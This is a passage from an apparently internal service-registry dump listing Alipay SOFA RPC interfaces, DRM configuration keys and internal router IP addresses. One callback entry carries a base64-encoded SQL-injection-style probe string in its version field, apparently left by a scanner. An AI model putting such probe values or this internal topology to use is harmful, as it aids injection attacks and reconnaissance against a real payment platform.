RateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.BatchApplyAssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.metric.MetricCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.smart.SmartSwitchConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.boss.facade.sofarest.UserSofarestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.holoxmng.complain.service.facade.ReportCharityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.shared.utils.NodeParameters.strategyWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tbx@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.backend.service.facade.resource.config.ResourceConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.IPictureCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkLuckDrawService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.core.service.decision.BenefitConfigFactory:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.consume.AutoServiceApplyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CASHIERDATACOLLECTOR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecSitecodeResultMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.test.EtcReconDetailTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:zmepcertifybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.BdGwOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.core.schduler.v2.resourcemanager.service.taskgroup.TaskGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.144.183#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finsteward.common.service.facade.fund.SegregateAccountProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsceneprod.facade.PcreditGoodsExchangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyPayRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ContentTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.ValidateRecordDrmResource.writeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_C_MOBILE_MGMT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pucprod.common.service.facade.jiaofei.CommunityRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jss.facade.service.ExportTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opsconsole.facade.network.VipQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.157.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.210.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:JWJmIiBPciBhbnR3ZWJzY2Fuc1lXNTA9T0RBeE1ESXdOVE10TFRFeE1EQXdNakF4TUE=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.rulecenter:name=com.alipay.rulecenter.core.engine.drm.impl.LogStrategy.perfcollectable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.service.facade.api.ExStandardProductSourceMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:PromoRecommend_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.api.CloseInvokeService:1.0:finsign_ext_account@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.54.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.saction.AuthSactionFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.facade.RateTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundTairManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENHOME#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.filterParentPolicySpNoListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.membertangram.common.service.facade.task.TaskOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_C_CSCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sdaclouddevice.facade.ha3.MiniAppTransmitHisSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ceresdb-console@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:socplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.inscvprod.common.service.facade.auditassisant.MaterialStructuredExtractionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antrecluse.facade.service.sample.LogSampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumng.common.service.facade.PlacardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.std.AbilitySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:${Dynamic-Module-Version}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chargefront.service.facade.api.ChargeFrontQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.app.TinyappCreatePublicAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdswindspeed.facade.evaluation.EvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fporgassetdecision#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pcloanbenefit.common.service.facade.h2h.extendoperate.PromoDrawPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.AssetManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_DEPOSIT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsign.common.service.facade.account.service.FinsignAccountQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.admin.polymer.DeliveryOrderAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchprod.module.kybmeta.facade.api.InstanceRuntimeService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.manager.SessionManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.GenericServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ztesla.common.service.facade.service.api.SceneAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:dsrconsoleMYBANK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.dal.ldc.offlinepay.daointerface.CardModelDAO:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_repository_supportKnowledgeFeedbackGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilecodec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:authweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.batchDeductReLoadShardUids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.ItemMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.task.TaskTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.msgnotify.OstsMsgNotifyRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.RoleService:1.0:roleService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.element.ElementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.ldc.AlipassPresentLDCFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inststub.common.service.facade.instance.InstInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.facade.PushThirdMultipleTemplateGzFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.api.QuoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pcreditpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:publichome_appCreateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYZAUTHJSESSIONID.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.208.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.faasset.api.order.FaOrderAssetTransCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.hbase.FinTntOutfluxDepositbackHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.GdLcStibNotTextAnnounceSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iuserdmp.common.service.facade.api.IuserMerchantDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.fortuneday.FortuneDayTabDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.hotevent.HotEventRelatedContentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.cardSlotSolutionProdCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_PAYLINK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitycap:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.remit.RemitRecordQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.common.service.integration.cif.UserAgreementInconsistentQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exchangecore.common.service.facade.ExChannelQueryWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.StockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:home_page_nonstop_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.routeClient:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.api.ApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.ChannelOperationStrategySignConsultFacade:1.0:mrchmobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.category.ContentWebCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tagsync.TagDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ac4int@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.WorkTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilecodec.service.facade.ShakeCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mservicesinspect_antProcessDecisionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.speech.reply.ReplyGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.102.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.paymentmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.SegmentsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SceneGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.recalculate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mngw.api.client.rpc.MNotifyPluginRPCService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetSupplyRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsettle.common.service.integration.kbsettle.KbSettleZoneDispatchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payment.common.api.AssetConsultService:1.0:pcreditdecisionAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msfluxconf:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.views,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricecenter.common.service.facade.api.policy.PolicyOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.enterprise.facade.EntRoleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransfercenter.service.facade.autotest.AutoTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.festival.FestivalTestClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ImmuneRuleVisualizationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.unifygw.facade.service.UnifygwServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointcore.common.mpoint.facade.MpointAccountFlowoutDetailQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.baas.WhiteListServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secuinfos.common.v3.service.facade.api.news.NewsListV30Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoLeadsFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.prepaidcard.PrepaidCardRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_OVERSEAS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.service.facade.api.SceneEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.biz.service.iothub.IotPayOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_BILL_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cicadaxbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.authcenter.service.facade.OauthCheckInvokeService:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.zpublish.biz.file.processor.strategy.wget.WgetParameters.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.InvolvedPartyRoleViewQueryFacade:1.0:involvedPartyRoleViewQueryFacadeForExtZone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ireserve.facade.api.BlockchainCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paydecisioncarina.service.facade.rt.TestTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebquery.common.facade.service.YebCommonQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cstask_towerCreateCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumecenter.common.service.facade.AsyncQueryTaskRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.common.service.facade.CDPDatasourceManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.UserActivityPrizeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.grayprod.change.drm.ChangePolicy.targetConfigTables,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.forum.ForumInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.question.QuestionTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbretailprod.common.facade.mall.MallActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivemng.common.service.facade.api.finishedaccess.FinishedAccessQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.ecologyPointMaxCampAmt,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mydds:name=com.alipay.mymdp.model.bypass.drm.DrmSwitchProxyResource.proxyModels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:${targetserver.type}@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinBusinessSumRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.api.TriggerTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcservicebus.client.BusClientInvoker:1.0:rcservicebus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.api.query.LcArgInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.SystemParamSwitchResource.riskWords,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcloud.cloudauth.common.service.facade.token.TokenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchprod.merchant.facade.api.MerchantManageService:1.0:imif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zappinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.boothCodeItem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.riskmng.riskmngDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insmobile.insmobileConfDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certify.service.facade.CertifyPersonInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:paymentmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.marketing.PrizeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.MobileContactUploadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.AclOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.30.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iconnect.common.facade.api.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.postmen.api.MessageManageApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appfuse@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.supportprod.facade.bdsv2.facade.BdsMerchantRequireFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:UcdpmngDetectTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.MPcardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:aircoreservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.RankQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.PepMessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.74.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fint